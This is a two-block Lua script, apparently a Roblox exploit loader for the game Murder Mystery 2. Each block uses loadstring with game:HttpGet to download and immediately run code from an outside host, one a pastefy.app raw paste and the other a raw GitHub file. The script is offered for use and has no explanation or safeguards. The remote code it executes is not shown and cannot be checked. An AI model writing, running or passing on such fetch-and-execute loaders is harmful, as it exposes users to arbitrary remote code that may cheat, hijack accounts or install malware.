task.spawn(function()
	loadstring(game:HttpGet("https://pastefy.app/2rtnltzW/raw", true))()
end)
task.spawn(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/XenaScripts/murdermyster2/refs/heads/main/Sxript.lua", true))()
end)
